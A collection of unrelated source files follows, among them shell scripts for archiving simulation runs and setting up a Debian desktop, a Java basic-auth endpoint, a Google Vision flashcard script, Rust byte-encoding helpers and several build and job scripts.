label_description=$3
fi
echo ""
echo "Storing model states with label" $label "in directory" $runid
echo ""
mkdir -vp $runid
for model in *_output.h5
do
newfile=${model/output/$label}
cp -v $model $runid/$newfile
done
# Copy fort.44
cp -v fort.44 $runid/fort.44
# Copy parameter files-------------------------------------------------
logdir=$runid/log_label_$label
echo ""
echo "Storing parameterlists in directory" $logdir
echo ""
mkdir -vp $logdir
for paramlist in *.xml
do
newparamlist=${paramlist/.xml/_$label.xml}
echo '<!-- LABEL' $label ': ' $label_description '-->' > $logdir/$newparamlist
echo $paramlist '->' $logdir/$newparamlist
cat $paramlist >> $logdir/$newparamlist
done
echo ""
echo "Copy outputfiles to" $logdir
echo ""
## Copy info files -----------------------------------------------------
for infofile in info_*.txt
do
newinfofile=${infofile/.txt/_lbl$label.txt}
echo 'LABEL' $label ': ' $label_description > $logdir/$newinfofile
echo $infofile '->' $logdir/$newinfofile
cat $infofile >> $logdir/$newinfofile
done
## Copy cdata/tdata file ----------------------------------------------------
cdatafile=cdata.txt
newcdatafile=${cdatafile/.txt/_lbl$label.txt}
echo $cdatafile '->' $logdir/$newcdatafile
cat $cdatafile > $logdir/$newcdatafile
tdatafile=tdata.txt
newtdatafile=${tdatafile/.txt/_lbl$label.txt}
echo $tdatafile '->' $logdir/$newtdatafile
cat $tdatafile > $logdir/$newtdatafile
echo ""
echo "Building log" $logdir
echo ""
contpar=`grep '\"Continuation parameter\"' continuation_params.xml | sed 's/.*value=\"//' | sed 's/\".*//'`
initstep=`grep '\"initial step size\"' continuation_params.xml | sed 's/.*value=\"//' | sed 's/\".*//'`
maxnumstep=`grep '\"maximum number of steps\"' continuation_params.xml | sed 's/.*value=\"//' | sed 's/\".*//'`
destvalue=`grep 'summary' -A20 info_0.txt | tail -n 21 | grep 'destination value' | sed 's/.*: //'`
parvalue=`grep 'summary' -A20 info_0.txt | tail -n 21 | grep 'parameter value' | sed 's/.*: //'`
startvalue=`grep 'summary' -A20 info_0.txt | tail -n 21 | grep 'starting value' | sed 's/.*: //'`
numsteps=`grep 'summary' -A20 info_0.txt | tail -n 21 | grep 'step:' | sed 's/.*: //'`
numresets=`grep 'summary' -A20 info_0.txt | tail -n 21 | grep 'resets:' | sed 's/.*: //'`
logfile=log
echo 'LABEL' $label ': ' $label_description > $logdir/$logfile
echo ' Continuation summary ' >> $logdir/$logfile
echo ' starting label: ' $startlabel >> $logdir/$logfile
echo ' parameter: ' $contpar >> $logdir/$logfile
echo ' parameter value: ' $parvalue >> $logdir/$logfile
echo ' starting value: ' $startvalue >> $logdir/$logfile
echo ' destination value: ' $destvalue >> $logdir/$logfile
echo ' initial step: ' $initstep >> $logdir/$logfile
echo ' total steps: ' $numsteps >> $logdir/$logfile
echo ' max allowed steps: ' $maxnumstep >> $logdir/$logfile
echo ' resets: ' $numresets >> $logdir/$logfile
echo "" >> $logdir/$logfile
all_logs=$runid/cont.log
echo "Collecting all logs in " $all_logs
echo ""
echo "Overview of labels; the order is based on time of label creation." > $all_logs
echo "" >> $all_logs
for logfile in `find $runid -name $logfile -printf "%T+%p\n" | sort`
do
cat ${logfile/*$runid/$runid} >> $all_logs
done
|
export default {
SENTRY_DNS: process.env.VUE_APP_SENTRY_DNS
};
|
/*
* Copyright (c) 2016 Nike, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.nike.cerberus.endpoints.authentication;
import com.nike.backstopper.exception.ApiException;
import com.nike.cerberus.auth.connector.AuthResponse;
import com.nike.cerberus.domain.UserCredentials;
import com.nike.cerberus.error.DefaultApiError;
import com.nike.cerberus.service.AuthenticationService;
import com.nike.cerberus.service.EventProcessorService;
import com.nike.riposte.server.http.RequestInfo;
import com.nike.riposte.server.http.ResponseInfo;
import com.nike.riposte.server.http.StandardEndpoint;
import com.nike.riposte.util.AsyncNettyHelper;
import com.nike.riposte.util.Matcher;
import io.netty.channel.ChannelHandlerContext;
import io.netty.handler.codec.http.HttpMethod;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.lang3.ArrayUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import javax.inject.Inject;
import javax.ws.rs.core.HttpHeaders;
import java.nio.charset.Charset;
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.Executor;
import static com.nike.cerberus.endpoints.AuditableEventEndpoint.auditableEvent;
/**
* Authentication endpoint for user credentials. If valid, a client token will be returned.
*/
public class AuthenticateUser extends StandardEndpoint<Void, AuthResponse> {
private final AuthenticationService authenticationService;
private final EventProcessorService eventProcessorService;
@Inject
public AuthenticateUser(AuthenticationService authenticationService,
EventProcessorService eventProcessorService) {
this.authenticationService = authenticationService;
this.eventProcessorService = eventProcessorService;
}
@Override
public CompletableFuture<ResponseInfo<AuthResponse>> execute(final RequestInfo<Void> request,
final Executor longRunningTaskExecutor,
final ChannelHandlerContext ctx) {
return CompletableFuture.supplyAsync(
AsyncNettyHelper.supplierWithTracingAndMdc(() -> authenticate(request), ctx),
longRunningTaskExecutor
);
}
private ResponseInfo<AuthResponse> authenticate(RequestInfo<Void> request) {
final UserCredentials credentials = extractCredentials(request.getHeaders().get(HttpHeaders.AUTHORIZATION));
AuthResponse authResponse = null;
try {
authResponse = authenticationService.authenticate(credentials);
} catch (ApiException e) {
eventProcessorService.ingestEvent(auditableEvent(credentials.getUsername(), request, getClass().getSimpleName())
.withAction("failed to authenticate")
.withSuccess(false)
.build()
);
throw e;
}
eventProcessorService.ingestEvent(auditableEvent(credentials.getUsername(), request, getClass().getSimpleName())
.withAction("authenticated")
.build()
);
return ResponseInfo.newBuilder(authResponse).build();
}
@Override
public Matcher requestMatcher() {
return Matcher.match("/v2/auth/user", HttpMethod.GET);
}
/**
* Extracts credentials from the Authorization header. Assumes its Basic auth.
*
* @param authorizationHeader Value from the authorization header
* @return User credentials that were extracted
*/
public UserCredentials extractCredentials(final String authorizationHeader) {
final String authType = "Basic";
if (authorizationHeader != null && authorizationHeader.startsWith(authType)) {
final String encodedCredentials = authorizationHeader.substring(authType.length()).trim();
final byte[] decodedCredentials = Base64.decodeBase64(encodedCredentials);
if (ArrayUtils.isNotEmpty(decodedCredentials)) {
final String[] credentials = new String(decodedCredentials, Charset.defaultCharset()).split(":", 2);
if (credentials.length == 2) {
return new UserCredentials(credentials[0], credentials[1].getBytes(Charset.defaultCharset()));
}
}
}
throw ApiException.newBuilder().withApiErrors(DefaultApiError.AUTH_BAD_CREDENTIALS).build();
}
}
|
from bs4 import BeautifulSoup
html = """
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<div class="container">
<div class="row">
<div class="col">
<ul class="list">
<li class="description">Professionally</li>
<li class="bullet-item">Expert</li>
<li class="bullet-item">Fast</li>
<li class="bullet-item">New Technology</li>
<li class="bullet-item">Using Node Js and Framework</li>
<li class="cta-button"><a class="button" href="https://example.com">Contact</a></li>
</ul>
</div>
</div>
</div>
</body>
</html>
"""
soup = BeautifulSoup(html, 'html.parser')
bullet_items = [li.text for li in soup.find_all('li', class_='bullet-item')]
cta_button_url = soup.find('li', class_='cta-button').a['href']
print(f"List of bullet items: {bullet_items}")
print(f"CTA button URL: {cta_button_url}") |
import { SidebarValue } from './components-basic.model';
export class OcSidebarSelectModel {
parent: SidebarValue;
child: SidebarValue;
}
|
#!/usr/bin/env bash
# Consume HTTP header
while read line; do
[[ -z ${line//$'\r'} ]] && break
done
read query
echo -e "HTTP/1.0 200 OK\r\ncontent-type: text/plain; charset=utf-8\r\n\r\n"
./jp "$query" | tee /dev/stderr
|
mod encode {
pub fn u16_buffer() -> Vec<u8> {
vec![0; 2] // Create a buffer of 2 bytes initialized with zeros
}
pub fn u16(n: u16, buf: &mut [u8]) -> &[u8] {
buf[0] = (n & 0xFF) as u8; // Store the lower 8 bits in the first byte
buf[1] = (n >> 8) as u8; // Store the upper 8 bits in the second byte
&buf[..2] // Return a slice of the buffer containing the encoded bytes
}
}
mod decode {
pub fn u16(bytes: &[u8]) -> Option<u16> {
if bytes.len() < 2 {
return None; // Return None if the input bytes are insufficient
}
let n = u16::from(bytes[0]) | (u16::from(bytes[1]) << 8); // Combine the bytes to form the 16-bit integer
Some(n) // Return the decoded 16-bit integer as Some
}
} |
<reponame>mdemong/hackathon-2019<filename>vision.js
// getCards('./bionotes5.jpg');
async function label() {
// Imports the Google Cloud client library
const vision = require('@google-cloud/vision');
// Creates a client
const client = new vision.ImageAnnotatorClient();
// Performs label detection on the image file
const [result] = await client.textDetection('./hackathon2.jpg');
const labels = result.labelAnnotations;
console.log('Labels:');
labels.forEach(label => console.log(label.description));
}
/**
* From https://stackoverflow.com/a/14731922
*
* Conserve aspect ratio of the original region. Useful when shrinking/enlarging
* images to fit into a certain area.
*
* @param {Number} srcWidth width of source image
* @param {Number} srcHeight height of source image
* @param {Number} maxWidth maximum available width
* @param {Number} maxHeight maximum available height
* @return {Object} { width, height }
*/
function calculateAspectRatioFit(srcWidth, srcHeight, maxWidth, maxHeight) {
var ratio = Math.min(maxWidth / srcWidth, maxHeight / srcHeight);
return { width: srcWidth * ratio, height: srcHeight * ratio };
}
async function text() {
const vision = require('@google-cloud/vision');
// Creates a client
const client = new vision.ImageAnnotatorClient();
const fileName = './hackathon2.jpg';
// Performs text detection on the local file
const [result] = await client.textDetection(fileName);
const detections = result.textAnnotations;
console.log('Text:');
// detections.forEach(text => console.log(text));
console.log(detections[0]['description']);
}
async function getCards(fileName) {
// Imports the Google Cloud client library
const vision = require('@google-cloud/vision');
// breaks = vision.enums.TextAnnotation.DetectedBreak.BreakType
// Creates a client
const client = new vision.ImageAnnotatorClient();
paragraphs = [];
lines = [];
// Read a local image as a text document
const [result] = await client.documentTextDetection(fileName);
const fullTextAnnotation = result.fullTextAnnotation;
console.log(`Full text:\n\n ${fullTextAnnotation.text}`);
const fullText = fullTextAnnotation.text;
// Getting fronts
let frontRegex = /(?<=-).*(?=:)/g;
let frontMatches = fullText.match(frontRegex);
let finalCardList = new Array();
for (const match of frontMatches) {
let frontText = match.trim().replace(/\n/, " ");
finalCardList.push({front: frontText + ""});
}
// Getting backs
let backRegex = /(?<=:)(.|\n)*?(?=-|$)/g
let backMatches = fullText.match(backRegex);
for (let i = 0; i < finalCardList.length; i++) {
let backText = backMatches[i].trim().replace(/\n/, " ");
finalCardList[i].back = backText;
}
console.log(JSON.stringify(finalCardList, undefined, 2));
// fullTextAnnotation.pages.forEach(page => {
// page.blocks.forEach(block => {
// console.log(`Block confidence: ${block.confidence}`);
// block.paragraphs.forEach(paragraph => {
// console.log(paragraph);
// console.log(`Paragraph confidence: ${paragraph.confidence}`);
// paragraph.words.forEach(word => {
// const wordText = word.symbols.map(s => s.text).join('');
// console.log(`Word text: ${wordText}`);
// console.log(`Word confidence: ${word.confidence}`);
// // word.symbols.forEach(symbol => {
// // console.log(`Symbol text: ${symbol.text}`);
// // console.log(`Symbol confidence: ${symbol.confidence}`);
// // });
// });
/*
/// Unfortunately, this section doesn't work: Paragraphs are not delimited
/// by the API in a way that makes sense for note scans. We would need to
/// implement our own algorithm based on another factor, such as text
/// coordinates.
// Adapted from: https://stackoverflow.com/a/52086299
let paraText = ""
paragraph.words.forEach(word => {
word.symbols.forEach(symbol => {
paraText += symbol.text;
console.log(symbol.text);
//console.log(JSON.stringify(symbol, undefined, 2));
if(symbol.property.detectedBreak) {
if (symbol.property.detectedBreak.type === "SPACE")
paraText += " ";
if (symbol.property.detectedBreak.type === "EOL_SURE_SPACE") {
paraText += " ";
}
// if (symbol.property.detectedBreak === "LINE_BREAK") {
// lines.push(lineText);
// paraText += lineText;
// lineText = "";
// }
}
})
})
console.log(paraText);
paragraphs.push(paraText);
*/
// });
// });
//console.log(paragraphs);
//console.log(lines);
// });
return finalCardList;
}
function getText(paragraph) {
}
module.exports = {getCards}; |
#!/bin/bash
# ---------------------------------------------------------------------------------------------------------------------
desktopAndroidStudio()
{
# PACKAGE_URL="https://redirector.gvt1.com/edgedl/android/studio/ide-zips/4.1.1.0/android-studio-ide-201.6953283-linux.tar.gz"
# PACKAGE_PATH="./packages/android-studio.deb"
# startRun "Android Studio"
# # Download the package installer if it was not pre-shipped with the script.
# if [ ! -f "$PACKAGE_PATH" ]; then
# wget $PACKAGE_URL -O $PACKAGE_PATH -q --show-progress
# fi
# # Install the package & it's dependencies.
# sudo tar -xf $PACKAGE_PATH -C /opt
# # Create a manual desktop icon for Android Studio.
# cat > $HOME/.local/share/applications/android-studio.desktop <<EOL
# [Desktop Entry]
# Version=1.0
# Type=Application
# Name=Android Studio
# Icon=/opt/android-studio/bin/studio.svg
# Exec="/opt/android-studio/bin/studio.sh" %f
# Comment=The Drive to Develop
# Categories=Development;IDE;
# Terminal=false
# StartupWMClass=jetbrains-studio
# Name[en_GB]=android-studio.desktop
# ...
# EOL
# # Set path variable for Android Studio.
# cp ./settings/.profile $HOME/.profile
# endRun
startRun "Android Studio"
sudo snap install android-studio --classic
endRun
}
desktopChrome()
{
# Read the following to learn more:
# https://www.itzgeek.com/how-tos/linux/debian/simple-way-to-install-google-chrome-on-debian-9.html
startRun "Chrome"
# Register the Google Chrome source repositories in APT.
wget -q -O - https://dl.google.com/linux/linux_signing_key.pub | sudo apt-key add -v -
echo deb http://dl.google.com/linux/chrome/deb/ stable main | sudo tee /etc/apt/sources.list.d/google-chrome.list
# Refresh the APT package list.
sudo apt-get -y update
# Install the package.
sudo apt-get -y install google-chrome-stable
endRun
}
desktopDiscord()
{
startRun "Discord"
flatpak install -y flathub com.discordapp.Discord
endRun
}
desktopDrawIO()
{
startRun "Draw.io"
sudo snap install drawio
endRun
}
desktopGIMP()
{
startRun "GIMP"
sudo snap install gimp
endRun
}
desktopInkscape()
{
startRun "Inkscape"
sudo snap install inkscape
endRun
}
desktopInsomnia()
{
startRun "Insomnia"
sudo snap install insomnia
endRun
}
desktopLibreOffice()
{
startRun "Libre Office"
sudo snap install libreoffice
endRun
}
desktopMinecraft()
{
PACKAGE_URL="https://launcher.mojang.com/download/Minecraft.deb"
PACKAGE_PATH="./packages/minecraft.deb"
startRun "Minecraft"
# Download the package installer if it was not pre-shipped with the script.
if [ ! -f "$PACKAGE_PATH" ]; then
wget $PACKAGE_URL -O $PACKAGE_PATH -q --show-progress
fi
# Install the package & it's dependencies.
sudo apt-get -y install $PACKAGE_PATH
endRun
}
desktopMongoDBCompass()
{
PACKAGE_URL="https://downloads.mongodb.com/compass/mongodb-compass_1.29.6_amd64.deb"
PACKAGE_PATH="./packages/mongodb-compass.deb"
startRun "MongoDB Compass"
# Download the package installer if it was not pre-shipped with the script.
if [ ! -f "$PACKAGE_PATH" ]; then
wget $PACKAGE_URL -O $PACKAGE_PATH -q --show-progress
fi
# Install the package & it's dependencies.
sudo apt-get -y install $PACKAGE_PATH
endRun
}
desktopPeek()
{
startRun "Peek"
flatpak install -y flathub com.uploadedlobster.peek
endRun
}
desktopPinta()
{
startRun "Pinta"
flatpak install -y flathub com.github.PintaProject.Pinta
endRun
}
desktopRaspberryPiImager()
{
startRun "Raspberry Pi Imager"
flatpak install -y flathub org.raspberrypi.rpi-imager
endRun
}
desktopSnapStore()
{
startRun "Snap Store"
sudo snap install snap-store
endRun
}
desktopSteam()
{
# Read the following to learn more:
# https://linuxconfig.org/how-to-install-steam-with-steam-play-on-debian-10-buster
PACKAGE_URL="https://steamcdn-a.akamaihd.net/client/installer/steam.deb"
PACKAGE_PATH="./packages/steam.deb"
startRun "Steam"
# Download the package installer if it was not pre-shipped with the script.
if [ ! -f "$PACKAGE_PATH" ]; then
wget $PACKAGE_URL -O $PACKAGE_PATH -q --show-progress
fi
# Enable i386 packages (cus steam sucks).
sudo dpkg --add-architecture i386
# Refresh the APT package list.
sudo apt-get -y update
# Install package dependencies.
sudo apt-get -y install libc6-i386
sudo apt-get -y install libgl1-mesa-dri:i386
sudo apt-get -y install libgl1-mesa-glx:i386
# Install the package & it's dependencies.
sudo apt-get -y install $PACKAGE_PATH
endRun
}
desktopTeams()
{
startRun "Teams"
sudo snap install teams
endRun
}
desktopVectr()
{
startRun "Vectr"
sudo snap install vectr
endRun
}
desktopVSCode()
{
startRun "VSCode"
sudo snap install code --classic
endRun
}
# ---------------------------------------------------------------------------------------------------------------------
serviceGit()
{
startRun "Git"
sudo apt-get -y install git
endRun
}
serviceNode()
{
NODEREPO="node_17.x"
DISTRO="$(lsb_release -s -c)"
startRun "Node"
# Register the Node source repositories in APT.
wget -q -O - https://deb.nodesource.com/gpgkey/nodesource.gpg.key | sudo apt-key add -
echo deb https://deb.nodesource.com/${NODEREPO} ${DISTRO} main | sudo tee /etc/apt/sources.list.d/nodesource.list
echo deb-src https://deb.nodesource.com/${NODEREPO} ${DISTRO} main | sudo tee -a /etc/apt/sources.list.d/nodesource.list
# Refresh the APT package list.
sudo apt-get -y update
# Install the package.
sudo apt-get -y install nodejs
endRun
}
serviceNordvpn()
{
# Read the following to learn more:
# https://support.nordvpn.com/Connectivity/Linux/1325531132/Installing-and-using-NordVPN-on-Debian-Ubuntu-and-Linux-Mint.htm
startRun "NordVPN"
# Register the NordVPN source repositories in APT.
wget -q -O - https://repo.nordvpn.com/gpg/nordvpn_public.asc | sudo apt-key add -
echo deb https://repo.nordvpn.com/deb/nordvpn/debian stable main | sudo tee /etc/apt/sources.list.d/nordvpn.list
# Refresh the APT package list.
sudo apt-get -y update
# Install the package.
sudo apt-get -y install nordvpn
endRun
}
# ---------------------------------------------------------------------------------------------------------------------
extensionDashToPanel()
{
# Get the package ID and URL.
PACKAGE_URL="https://extensions.gnome.org/extension-data/dash-to-paneljderose9.github.com.v40.shell-extension.zip"
PACKAGE_PATH="extensions/dash-to-panel.zip"
startRun "Dash to Panel"
# Download the package installer if it was not pre-shipped with the script.
if [ ! -f "$PACKAGE_PATH" ]; then
wget $PACKAGE_URL -O $PACKAGE_PATH -q --show-progress
fi
# Lookup the extension UUID.
EXTENSTION_UUID=$(unzip -c $PACKAGE_PATH metadata.json | grep uuid | cut -d \" -f4)
# Extract the extension into Gnome shell.
mkdir -p $HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID
unzip -q -o $PACKAGE_PATH -d $HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID
# Enable or reload the extension.
echo $EXTENSTION_UUID
gnome-shell-extension-tool -e $EXTENSTION_UUID || gnome-shell-extension-tool -r $EXTENSTION_UUID
# Load the extension configuration into DConf.
cat ./settings/dash-to-panel.conf | dconf load /org/gnome/shell/extensions/dash-to-panel/
endRun
}
extensionArcMenu()
{
# Get the package ID and URL.
PACKAGE_URL="https://extensions.gnome.org/extension-data/arc-menulinxgem33.com.v49.shell-extension.zip"
PACKAGE_PATH="extensions/arc-menu.zip"
startRun "Arc Menu"
# Download the package installer if it was not pre-shipped with the script.
if [ ! -f "$PACKAGE_PATH" ]; then
wget $PACKAGE_URL -O $PACKAGE_PATH -q --show-progress
fi
# Lookup the extension UUID.
EXTENSTION_UUID=$(unzip -c $PACKAGE_PATH metadata.json | grep uuid | cut -d \" -f4)
# Extract the extension into Gnome shell.
mkdir -p $HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID
unzip -q -o $PACKAGE_PATH -d $HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID
# Enable or reload the extension.
gnome-shell-extension-tool -e $EXTENSTION_UUID || gnome-shell-extension-tool -r $EXTENSTION_UUID
# Load the extension configuration into DConf.
cat ./settings/arc-menu.conf | dconf load /org/gnome/shell/extensions/arc-menu/
endRun
}
extensionAppFolders()
{
# Get the package ID and URL.
PACKAGE_URL="https://extensions.gnome.org/extension-data/appfolders-managermaestroschan.fr.v16.shell-extension.zip"
PACKAGE_PATH="extensions/app-folders.zip"
startRun "App Folders"
# Download the package installer if it was not pre-shipped with the script.
if [ ! -f "$PACKAGE_PATH" ]; then
wget $PACKAGE_URL -O $PACKAGE_PATH -q --show-progress
fi
# Lookup the extension UUID.
EXTENSTION_UUID=$(unzip -c $PACKAGE_PATH metadata.json | grep uuid | cut -d \" -f4)
# Extract the extension into Gnome shell.
mkdir -p $HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID
unzip -q -o $PACKAGE_PATH -d $HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID
# Enable or reload the extension.
gnome-shell-extension-tool -e $EXTENSTION_UUID || gnome-shell-extension-tool -r $EXTENSTION_UUID
endRun
}
extensionStartOverlayInAppView()
{
# Get the package ID and URL.
PACKAGE_URL="https://extensions.gnome.org/extension-data/start-overlay-in-application-view%40cis.net.v2.shell-extension.zip"
PACKAGE_PATH="extensions/start-overlay-in-app-view.zip"
startRun "Start Overlay in App View"
# Download the package installer if it was not pre-shipped with the script.
if [ ! -f "$PACKAGE_PATH" ]; then
wget $PACKAGE_URL -O $PACKAGE_PATH -q --show-progress
fi
# Lookup the extension UUID.
EXTENSTION_UUID=$(unzip -c $PACKAGE_PATH metadata.json | grep uuid | cut -d \" -f4)
# Extract the extension into Gnome shell.
mkdir -p $HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID
unzip -q -o $PACKAGE_PATH -d $HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID
# Enable or reload the extension.
gnome-shell-extension-tool -e $EXTENSTION_UUID || gnome-shell-extension-tool -r $EXTENSTION_UUID
endRun
}
extensionEscapeToCloseOverlay()
{
# Get the package ID and URL.
PACKAGE_URL="https://extensions.gnome.org/extension-data/ESC_to_close_overview%40daniel.badawi.me.v3.shell-extension.zip"
PACKAGE_PATH="extensions/escape-to-close-overlay.zip"
startRun "Escape to Close Overlay"
# Download the package installer if it was not pre-shipped with the script.
if [ ! -f "$PACKAGE_PATH" ]; then
wget $PACKAGE_URL -O $PACKAGE_PATH -q --show-progress
fi
# Lookup the extension UUID.
EXTENSTION_UUID=$(unzip -c $PACKAGE_PATH metadata.json | grep uuid | cut -d \" -f4)
# Extract the extension into Gnome shell.
mkdir -p $HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID
unzip -q -o $PACKAGE_PATH -d $HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID
# Enable or reload the extension.
gnome-shell-extension-tool -e $EXTENSTION_UUID || gnome-shell-extension-tool -r $EXTENSTION_UUID
endRun
}
extensionShowDesktopIcons()
{
# Get the package ID and URL.
PACKAGE_URL="https://extensions.gnome.org/extension-data/desktop-iconscsoriano.v15.shell-extension.zip"
PACKAGE_PATH="extensions/show-desktop-icons.zip"
startRun "Show Desktop Icons"
# Download the package installer if it was not pre-shipped with the script.
if [ ! -f "$PACKAGE_PATH" ]; then
wget $PACKAGE_URL -O $PACKAGE_PATH -q --show-progress
fi
# Lookup the extension UUID.
EXTENSTION_UUID=$(unzip -c $PACKAGE_PATH metadata.json | grep uuid | cut -d \" -f4)
# Extract the extension into Gnome shell.
mkdir -p $HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID
unzip -q -o $PACKAGE_PATH -d $HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID
# Enable or reload the extension.
gnome-shell-extension-tool -e $EXTENSTION_UUID || gnome-shell-extension-tool -r $EXTENSTION_UUID
endRun
}
extensionNordvpnStatus()
{
# Get the package ID and URL.
PACKAGE_URL="https://extensions.gnome.org/extension-data/nordvpn_statusjcmartinez.dev.v7.shell-extension.zip"
PACKAGE_PATH="extensions/nordvpn-status.zip"
startRun "NordVPN Status"
# Download the package installer if it was not pre-shipped with the script.
if [ ! -f "$PACKAGE_PATH" ]; then
wget $PACKAGE_URL -O $PACKAGE_PATH -q --show-progress
fi
# Lookup the extension UUID.
EXTENSTION_UUID=$(unzip -c $PACKAGE_PATH metadata.json | grep uuid | cut -d \" -f4)
# Extract the extension into Gnome shell.
mkdir -p $HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID
unzip -q -o $PACKAGE_PATH -d $HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID
# Enable or reload the extension.
gnome-shell-extension-tool -e $EXTENSTION_UUID || gnome-shell-extension-tool -r $EXTENSTION_UUID
endRun
}
# ---------------------------------------------------------------------------------------------------------------------
themeVimix()
{
# Get the package ID and URL.
PACKAGE_ID="vimix-gtk-themes"
PACKAGE_VERSION="2020-02-24"
ACTIVE_SET="vimix-doder"
PACKAGE_URL="https://codeload.github.com/vinceliuice/$PACKAGE_ID/zip/$PACKAGE_VERSION"
PACKAGE_PATH="themes/$PACKAGE_ID.zip"
startRun "Vimix"
# Download the package installer if it was not pre-shipped with the script.
if [ ! -f "$PACKAGE_PATH" ]; then
wget $PACKAGE_URL -O $PACKAGE_PATH -q --show-progress
fi
# Extract the theme package.
unzip -q -o $PACKAGE_PATH -d themes/$PACKAGE_ID
# Install the theme package.
./themes/$PACKAGE_ID/$PACKAGE_ID-$PACKAGE_VERSION/install.sh
# Activate the theme.
gsettings set org.gnome.desktop.interface gtk-theme $ACTIVE_SET
# Remove the extracted source folder.
rm -r themes/$PACKAGE_ID
endRun
}
# ---------------------------------------------------------------------------------------------------------------------
iconsPapirus()
{
# Get the package ID and URL.
PACKAGE_ID="papirus-icon-theme"
PACKAGE_VERSION="20200405"
ACTIVE_SET="Papirus"
PACKAGE_URL="https://codeload.github.com/PapirusDevelopmentTeam/$PACKAGE_ID/zip/$PACKAGE_VERSION"
PACKAGE_PATH="icons/$PACKAGE_ID.zip"
startRun "Papirus"
# Download the package installer if it was not pre-shipped with the script.
if [ ! -f "$PACKAGE_PATH" ]; then
wget $PACKAGE_URL -O $PACKAGE_PATH -q --show-progress
fi
# Extract the icons package.
unzip -q -o $PACKAGE_PATH -d icons/$PACKAGE_ID
# Install the icons package.
./icons/$PACKAGE_ID/$PACKAGE_ID-$PACKAGE_VERSION/install.sh
# Activate the icon set.
gsettings set org.gnome.desktop.interface icon-theme $ACTIVE_SET
# Remove the extracted source folder.
rm -r icons/$PACKAGE_ID
endRun
}
# ---------------------------------------------------------------------------------------------------------------------
themeVimix()
{
# Get the package ID and URL.
PACKAGE_ID="vimix-gtk-themes"
PACKAGE_VERSION="2020-02-24"
ACTIVE_SET="vimix-doder"
PACKAGE_URL="https://codeload.github.com/vinceliuice/$PACKAGE_ID/zip/$PACKAGE_VERSION"
PACKAGE_PATH="themes/$PACKAGE_ID.zip"
startRun "Vimix"
# Download the package installer if it was not pre-shipped with the script.
if [ ! -f "$PACKAGE_PATH" ]; then
wget $PACKAGE_URL -O $PACKAGE_PATH -q --show-progress
fi
# Extract the theme package.
unzip -q -o $PACKAGE_PATH -d themes/$PACKAGE_ID
# Install the theme package.
./themes/$PACKAGE_ID/$PACKAGE_ID-$PACKAGE_VERSION/install.sh
# Activate the theme.
gsettings set org.gnome.desktop.interface gtk-theme $ACTIVE_SET
# Remove the extracted source folder.
rm -r themes/$PACKAGE_ID
endRun
}
# ---------------------------------------------------------------------------------------------------------------------
iconsPapirus()
{
# Get the package ID and URL.
PACKAGE_ID="papirus-icon-theme"
PACKAGE_VERSION="20200405"
ACTIVE_SET="Papirus"
PACKAGE_URL="https://codeload.github.com/PapirusDevelopmentTeam/$PACKAGE_ID/zip/$PACKAGE_VERSION"
PACKAGE_PATH="icons/$PACKAGE_ID.zip"
startRun "Papirus"
# Download the package installer if it was not pre-shipped with the script.
if [ ! -f "$PACKAGE_PATH" ]; then
wget $PACKAGE_URL -O $PACKAGE_PATH -q --show-progress
fi
# Extract the icons package.
unzip -q -o $PACKAGE_PATH -d icons/$PACKAGE_ID
# Install the icons package.
./icons/$PACKAGE_ID/$PACKAGE_ID-$PACKAGE_VERSION/install.sh
# Activate the icon set.
gsettings set org.gnome.desktop.interface icon-theme $ACTIVE_SET
# Remove the extracted source folder.
rm -r icons/$PACKAGE_ID
endRun
} |
#!/bin/bash
#SBATCH -J Act_cosper_1
#SBATCH --mail-user=eger@ukp.informatik.tu-darmstadt.de
#SBATCH --mail-type=FAIL
#SBATCH -e /work/scratch/se55gyhe/log/output.err.%j
#SBATCH -o /work/scratch/se55gyhe/log/output.out.%j
#SBATCH -n 1 # Number of cores
#SBATCH --mem-per-cpu=2000
#SBATCH -t 23:59:00 # Hours, minutes and seconds, or '#SBATCH -t 10' -only mins
#module load intel python/3.5
python3 /home/se55gyhe/Act_func/progs/meta.py cosper 1 Adagrad 2 0.32948285423491797 78 0.008843421161991835 rnormal PE-infersent 0.01
|
#!/bin/bash
if [[ $target_platform =~ linux.* ]] || [[ $target_platform == win-32 ]] || [[ $target_platform == win-64 ]] || [[ $target_platform == osx-64 ]]; then
export DISABLE_AUTOBREW=1
mv DESCRIPTION DESCRIPTION.old
grep -v '^Priority: ' DESCRIPTION.old > DESCRIPTION
$R CMD INSTALL --build .
else
mkdir -p $PREFIX/lib/R/library/argparser
mv * $PREFIX/lib/R/library/argparser
fi
|
#!/bin/bash
# Shell script for ask-cli pre-deploy hook for Python
# Script Usage: pre_deploy_hook.sh <SKILL_NAME> <DO_DEBUG> <TARGET>
# SKILL_NAME is the preformatted name passed from the CLI, after removing special characters.
# DO_DEBUG is boolean value for debug logging
# TARGET is the deploy TARGET provided to the CLI. (eg: all, skill, lambda etc.)
# Run this script under skill root folder
# The script does the following:
# - Create a temporary 'lambda_upload' directories under each SOURCE_DIR folder
# - Copy the contents of '<SKILL_NAME>/SOURCE_DIR' folder into '<SKILL_NAME>/SOURCE_DIR/lambda_upload'
# - Copy the contents of site packages in $VIRTUALENV created in <SKILL_NAME>/.venv/ folder
# - Update the location of this 'lambda_upload' folder to skill.json for zip and upload
